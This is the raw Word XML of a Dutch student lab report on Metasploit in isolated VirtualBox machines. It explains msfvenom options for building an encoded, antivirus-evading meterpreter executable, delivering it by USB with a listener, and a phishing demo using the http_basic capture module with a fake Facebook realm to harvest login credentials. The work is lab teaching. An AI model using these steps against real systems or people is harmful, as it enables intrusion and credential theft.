      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DE44D0">
        <w:t xml:space="preserve"> genereert in verschillende formaten en het </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DE44D0">
        <w:t>encoderen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DE44D0">
        <w:t xml:space="preserve"> van deze </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DE44D0">
        <w:t>payloads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DE44D0">
        <w:t xml:space="preserve"> met verschillende encoder modules)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, deze </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> moeten we dan op het toestel van het slachtoffer zien te krijgen, als het slachtoffer deze </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> opent zal er een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> sessie gestart worden.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7015" w:rsidRDefault="004C7F52" w:rsidP="004C7F52">
      <w:r>
        <w:t xml:space="preserve">Het aanmaken van de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="nl-BE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45A587AE" wp14:editId="66C8A86C">
            <wp:extent cx="5760720" cy="295910"/>
            <wp:effectExtent l="0" t="0" r="0" b="889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015">
        <w:t xml:space="preserve">-p: de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CE7015">
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CE7015">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7015" w:rsidRDefault="00CE7015" w:rsidP="004C7F52">
      <w:r>
        <w:t xml:space="preserve">-e: de encoder die gebruikt word om de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> te </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>encoden</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(techniek om antivirus te omzeilen).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7015" w:rsidRDefault="00CE7015" w:rsidP="004C7F52">
      <w:r>
        <w:t xml:space="preserve">-b: lijst van </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>characters</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> die vermeden moeten worden.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7015" w:rsidRDefault="00CE7015" w:rsidP="00CE7015">
      <w:r>
        <w:t xml:space="preserve">LHOST: is het </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> adres van de aanvaller.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7015" w:rsidRDefault="00CE7015" w:rsidP="004C7F52">
      <w:r>
        <w:t xml:space="preserve">-f : format van de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D15571" w:rsidRDefault="00D15571" w:rsidP="004C7F52">
      <w:r>
        <w:t xml:space="preserve">Hierna voert men het commando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> uit en dan zal de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> worden aangemaakt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7015" w:rsidRDefault="00CE7015" w:rsidP="004C7F52"/>
    <w:p w:rsidR="004C7F52" w:rsidRDefault="004C7F52" w:rsidP="004C7F52">
      <w:r>
        <w:t xml:space="preserve">Met behulp van een usb stick hebben we de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file op de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xp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> machine gekregen:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="nl-BE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46966AC8" wp14:editId="51B4DD45">
            <wp:extent cx="5760720" cy="4302760"/>
            <wp:effectExtent l="0" t="0" r="0" b="254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71" w:rsidRDefault="00D15571" w:rsidP="004C7F52"/>
    <w:p w:rsidR="00D15571" w:rsidRDefault="00D15571" w:rsidP="004C7F52"/>
    <w:p w:rsidR="00D15571" w:rsidRDefault="00D15571" w:rsidP="004C7F52"/>
    <w:p w:rsidR="004C7F52" w:rsidRDefault="004C7F52" w:rsidP="004C7F52">
      <w:r>
        <w:t>Nu moe</w:t>
      </w:r>
      <w:r w:rsidR="00DE44D0">
        <w:t xml:space="preserve">ten we </w:t>
      </w:r>
      <w:r w:rsidR="00D15571">
        <w:t xml:space="preserve">een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D15571">
        <w:t>listener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D15571">
        <w:t xml:space="preserve"> instellen die luistert naar binnenkomende verbindingen op de juiste poort.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C7F52" w:rsidRDefault="004C7F52" w:rsidP="004C7F52">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="nl-BE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D6904D2" wp14:editId="23A31F0E">
            <wp:extent cx="5760720" cy="2037715"/>
            <wp:effectExtent l="0" t="0" r="0" b="63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F52" w:rsidRDefault="004C7F52" w:rsidP="004C7F52">
      <w:r>
        <w:t>Vanaf dat de .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> uitgevoerd wordt zal er een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> sessie gestart worden. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7015" w:rsidRDefault="0030625A" w:rsidP="004C7F52">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="nl-BE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B6881E1" wp14:editId="2D4D1F8A">
            <wp:extent cx="5760720" cy="107569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0F" w:rsidRDefault="00D5180F" w:rsidP="004C7F52"/>
    <w:p w:rsidR="00BE7301" w:rsidRDefault="00BE7301" w:rsidP="00BE7301">
      <w:pPr>
        <w:pStyle w:val="Kop2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc440110973"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Phising</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>log-in</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> gegevens</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7301" w:rsidRDefault="00BE7301" w:rsidP="00BE7301">
      <w:r>
        <w:t xml:space="preserve">We maken gebruik van een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> XP servicepack 3 VM (virtuele machine) en een VM waar kali (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) op geïnstalleerd is.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7301" w:rsidRDefault="00BE7301" w:rsidP="00BE7301">
      <w:r>
        <w:t xml:space="preserve">We starten beide virtuele machines </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7301" w:rsidRDefault="00BE7301" w:rsidP="00BE7301">
      <w:r>
        <w:t xml:space="preserve">Om beide machines met elkaar te laten communiceren moeten we enkele stappen ondernemen. </w:t>
      </w:r>
      <w:r w:rsidRPr="0097675B">
        <w:t>Wij gaan dit m.b.v. de ‘VBoxManage.exe’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>realizeren</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7301" w:rsidRDefault="00BE7301" w:rsidP="00BE7301">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="nl-BE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E4C0991" wp14:editId="5617CCB3">
            <wp:extent cx="3895725" cy="2309398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8434" cy="231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01" w:rsidRDefault="00BE7301" w:rsidP="00BE730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7675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We maken een DHCP server die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p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dressen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leased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an 10.0.1.2 tot 10.0.1.200 aan onze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VM’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00BE7301" w:rsidRPr="0097675B" w:rsidRDefault="00BE7301" w:rsidP="00BE730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noProof/>
          <w:lang w:eastAsia="nl-BE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A14E4BD" wp14:editId="3E980E36">
            <wp:extent cx="5760720" cy="728980"/>
            <wp:effectExtent l="0" t="0" r="0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01" w:rsidRDefault="00BE7301" w:rsidP="00BE7301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  <w:t>‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0097675B"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  <w:t>VBoxManage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0097675B"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97675B"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  <w:t>dhcpserver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0097675B"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  <w:t xml:space="preserve"> add --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0097675B"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  <w:t>netname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0097675B"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97675B"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  <w:t>intnet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0097675B"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  <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0097675B"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  <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0097675B"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  <w:t xml:space="preserve"> 10.0.1.1 --netmask 255.255.255.0 --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0097675B"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  <w:t>lowerip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0097675B"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  <w:t xml:space="preserve"> 10.0.1.2 --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0097675B"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  <w:t>upperip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0097675B"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  <w:t xml:space="preserve"> 10.0.1.200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  <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="0097675B"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  <w:t>enabl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  <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7301" w:rsidRPr="000D7E6D" w:rsidRDefault="00BE7301" w:rsidP="00BE7301">
      <w:r w:rsidRPr="000D7E6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tel het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P adres van je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windows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XP correct in.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7301" w:rsidRPr="0097675B" w:rsidRDefault="00BE7301" w:rsidP="00BE7301">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="nl-BE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A660881" wp14:editId="6761235D">
            <wp:extent cx="3470340" cy="3133725"/>
            <wp:effectExtent l="0" t="0" r="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4011" cy="313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01" w:rsidRDefault="00BE7301" w:rsidP="00BE7301">
      <w:r w:rsidRPr="00864DA2">
        <w:t xml:space="preserve">Controleer </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip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van beide </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>VM’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00BE7301" w:rsidRPr="00864DA2" w:rsidRDefault="00BE7301" w:rsidP="00BE7301">
      <w:r>
        <w:t>Kali:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7301" w:rsidRPr="0097675B" w:rsidRDefault="00BE7301" w:rsidP="00BE7301">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="nl-BE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14969336" wp14:editId="6F9A2BB9">
            <wp:extent cx="4762500" cy="2631659"/>
            <wp:effectExtent l="0" t="0" r="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6683" cy="263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01" w:rsidRPr="0097675B" w:rsidRDefault="00BE7301" w:rsidP="00BE7301">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Windows XP service pack 3:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7301" w:rsidRPr="0097675B" w:rsidRDefault="00BE7301" w:rsidP="00BE7301">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="nl-BE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="088C3F63" wp14:editId="07687117">
            <wp:extent cx="4581525" cy="1343025"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525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01" w:rsidRPr="00864DA2" w:rsidRDefault="00BE7301" w:rsidP="00BE7301">
      <w:r w:rsidRPr="00864DA2">
        <w:t xml:space="preserve">Zet beide </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00864DA2">
        <w:t>network</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00864DA2">
        <w:t xml:space="preserve"> adapters van de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00864DA2">
        <w:t>V</w:t>
      </w:r>
      <w:r>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="00864DA2">
        <w:t>’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00864DA2">
        <w:t xml:space="preserve"> op  Intern </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00864DA2">
        <w:t>network</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00864DA2">
        <w:t xml:space="preserve"> en geef ze</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de naam </w:t>
      </w:r>
      <w:r w:rsidRPr="00864DA2">
        <w:t>‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00864DA2">
        <w:t>intnet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00864DA2">
        <w:t xml:space="preserve">’ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7301" w:rsidRDefault="00BE7301" w:rsidP="00BE7301">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="nl-BE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CC734B4" wp14:editId="113DC3D2">
            <wp:extent cx="4691361" cy="2162175"/>
            <wp:effectExtent l="0" t="0" r="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6997" cy="216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01" w:rsidRPr="00FF0D06" w:rsidRDefault="00BE7301" w:rsidP="00BE7301">
      <w:r w:rsidRPr="00FF0D06">
        <w:t>Controleer of de machines met elkaar kunnen communiceren</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7301" w:rsidRPr="00FF0D06" w:rsidRDefault="00BE7301" w:rsidP="00BE7301">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="nl-BE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="098E0E62" wp14:editId="29CA76D5">
            <wp:extent cx="5219700" cy="127635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01" w:rsidRDefault="00BE7301" w:rsidP="00BE7301"/>
    <w:p w:rsidR="00BE7301" w:rsidRDefault="00BE7301" w:rsidP="00BE7301">
      <w:r>
        <w:t xml:space="preserve">We starten op de kali VM de terminal en loggen in op het root account. Vervolgens starten we de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploi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) terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7301" w:rsidRDefault="00BE7301" w:rsidP="00BE7301">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="nl-BE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="573D89D1" wp14:editId="6EDCF8DB">
            <wp:extent cx="2619375" cy="381000"/>
            <wp:effectExtent l="0" t="0" r="9525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01" w:rsidRDefault="00BE7301" w:rsidP="00BE7301">
      <w:r>
        <w:t>We maken gebruik van ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>auxiliary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/server/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>capture</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>http_basic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">’ module. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7301" w:rsidRDefault="00BE7301" w:rsidP="00BE7301">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="nl-BE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E43D2E9" wp14:editId="7AFEF71A">
            <wp:extent cx="4276725" cy="447675"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525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01" w:rsidRDefault="00BE7301" w:rsidP="00BE7301">
      <w:r>
        <w:t xml:space="preserve">Uit de gegeven opties gebruiken we het </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>realm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> commando: ‘set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>realm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> facebook gateway’. We gebruiken dit voorbeeld om de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>credentials</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> van een slachtoffer zijn facebook account te weten te komen.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7301" w:rsidRPr="00782A56" w:rsidRDefault="00BE7301" w:rsidP="00BE7301">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="nl-BE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="225AA512" wp14:editId="0A7B6A80">
            <wp:extent cx="4810125" cy="514350"/>
            <wp:effectExtent l="0" t="0" r="9525" b="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01" w:rsidRDefault="00BE7301" w:rsidP="00BE7301">
      <w:r>
        <w:t xml:space="preserve">Zet een de default </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uripath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> met ‘set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uripath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7301" w:rsidRDefault="00BE7301" w:rsidP="00BE7301">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="nl-BE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BB16480" wp14:editId="1F695E97">
            <wp:extent cx="3638550" cy="361950"/>
            <wp:effectExtent l="0" t="0" r="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01" w:rsidRDefault="00BE7301" w:rsidP="00BE7301">
      <w:r>
        <w:t xml:space="preserve">Run de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, de server luistert naar het verkeer op poort 80.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="nl-BE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="285E8366" wp14:editId="4CE3B0E7">
            <wp:extent cx="3724275" cy="1419225"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525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01" w:rsidRDefault="00BE7301" w:rsidP="00BE7301">
      <w:r>
        <w:t xml:space="preserve">Open de browser en ga naar het </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>locale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adres 127.0.0.1:80. Een pop-up vraagt om jezelf te </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>authenticeren</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> op facebook.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7301" w:rsidRDefault="00BE7301" w:rsidP="00BE7301">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="nl-BE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56066762" wp14:editId="4EB8EFCB">
            <wp:extent cx="5760720" cy="2872740"/>
            <wp:effectExtent l="0" t="0" r="0" b="381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01" w:rsidRDefault="00BE7301" w:rsidP="00BE7301">
      <w:r>
        <w:t xml:space="preserve">Eens ingevuld en op OK geklikt, stuurt de aanvaller een server </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>not</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> found error:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7301" w:rsidRDefault="00BE7301" w:rsidP="00BE7301">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="nl-BE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27D42CBE" wp14:editId="11C54161">
            <wp:extent cx="6353735" cy="142875"/>
            <wp:effectExtent l="0" t="0" r="9525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58983" cy="14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01" w:rsidRDefault="00BE7301" w:rsidP="00BE7301">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="nl-BE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5769DD3C" wp14:editId="13592D14">
            <wp:extent cx="4581525" cy="2581275"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525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01" w:rsidRDefault="00BE7301" w:rsidP="00BE7301">
      <w:r>
        <w:t xml:space="preserve">De aanvaller heeft tegelijkertijd de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>credentials</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> binnengekregen. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Namenlijk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: ID = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>facebookUsername</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fbPassword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00BE7301" w:rsidRDefault="00BE7301" w:rsidP="00BE7301">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="nl-BE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F23096B" wp14:editId="5E2D2DB4">
            <wp:extent cx="5760720" cy="340995"/>
            <wp:effectExtent l="0" t="0" r="0" b="190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54" w:rsidRDefault="000F6254" w:rsidP="000F6254">
      <w:pPr>
        <w:pStyle w:val="Kop1"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> sessie</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w:rsidR="00120DEA" w:rsidRDefault="00120DEA" w:rsidP="00B83FB4"/>
    <w:p w:rsidR="00885F6E" w:rsidRDefault="00885F6E" w:rsidP="00B83FB4"/>
    <w:p w:rsidR="00E86C38" w:rsidRPr="00E86C38" w:rsidRDefault="00E86C38" w:rsidP="00E86C38">
      <w:pPr>
        <w:pStyle w:val="Kop2"/>
      </w:pPr>
